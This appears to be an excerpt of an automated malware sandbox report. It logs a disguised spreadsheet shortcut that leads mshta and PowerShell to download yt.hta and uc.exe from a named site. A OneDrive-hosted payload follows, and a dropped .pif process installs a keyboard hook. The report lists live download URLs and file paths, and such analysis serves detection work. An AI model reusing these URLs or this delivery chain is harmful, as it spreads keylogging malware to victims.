Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /assets/aw/yt.hta HTTP/1.1; Accept: */*; Accept-Language: en-CH; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: www.sessosesso.it; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /assets/aw/Book1.xlsx HTTP/1.1; Host: sessosesso.it; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /assets/aw/uc.exe HTTP/1.1; Host: www.sessosesso.it; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: onedrive.live.com
Source: unknown; DNS traffic detected: queries for: www.sessosesso.it
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: powershell.exe, 00000011.00000002.1634145596.0000029E324B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: svchost.exe, 0000000E.00000002.2531370506.0000021C38E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.irmaklarpaslanmaz.com.tr
                    Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0o
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000F.00000002.1839645117.000002B07C378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.o
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: uc.exe, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000000.1494201950.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 00000019.00000000.1623023662.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif, 0000001B.00000000.1707510490.0000000000416000.00000002.00000001.01000000.0000000F.sdmp, bwsiuvcU.pif.19.drString found in binary or memory: http://www.pmail.com
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DE3A000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683385991.0000000041372000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1677075916.000000003BE2B000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025FC9000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1794000591.00000000294C3000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD89000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2552799293.000000003BDB8000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556860764.0000000041253000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: bwsiuvcU.pif, 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: powershell.exe, 0000000F.00000002.1678474741.000002B000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38CD9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                    Source: svchost.exe, 0000000E.00000003.1320362193.0000021C38C80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A30E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000000F.00000002.1678474741.000002B0011BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/
                    Source: powershell.exe, 0000000F.00000002.1813302246.000002B010082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1813302246.000002B0101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1546422130.0000029E2A0E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/_
                    Source: uc.exe, 00000013.00000002.1500694013.00000000025ED000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/downlo
                    Source: uc.exe, 00000013.00000002.1500694013.00000000025D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=
                    Source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sessosesso.it
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A4D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sessosesso.it/assets/aw/Book1.xlsx
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it
                    Source: mshta.exe, 00000009.00000002.1863478690.0000019AC1727000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1724000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A557000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/Book1.xlsx
                    Source: powershell.exe, 00000011.00000002.1450441892.0000029E1A55B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/uc.exep
                    Source: mshta.exe, 00000009.00000002.1865747161.000001A2C9C00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta
                    Source: mshta.exe, 00000009.00000002.1864667684.000001A2C42A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...
                    Source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta...-
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta1
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta5
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta6288
                    Source: FT. 40FE CNY .xlsx.lnk | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaAC:
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC1680000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaC:
                    Source: mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaDe
                    Source: mshta.exe, 00000009.00000002.1863790955.0000019AC1850000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaH
                    Source: mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaLMEMX
                    Source: mshta.exe, 00000009.00000002.1863884931.0000019AC19B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaPS_BROW
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaU
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.hta_
                    Source: mshta.exe, 00000009.00000003.1859449128.000001A2C48C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta
                    Source: mshta.exe, 00000009.00000002.1863133474.0000019AC170A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sessosesso.it/assets/aw/yt.htaindows
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://zyupsq.by.files.1drv.com/
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://zyupsq.by.files.1drv.com/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY17Y2
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cu
                    Source: uc.exe, 00000013.00000002.1496845420.000000000081B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://zyupsq.by.files.1drv.com:443/y4mZWAAbbWbD2Z_SLbFHXttkWK-AZlqt62tunxr4xpHZuH07d5XHa5kbVXE61GY
                    Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknown | HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\Public\Libraries\bwsiuvcU.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\bwsiuvcU.pif
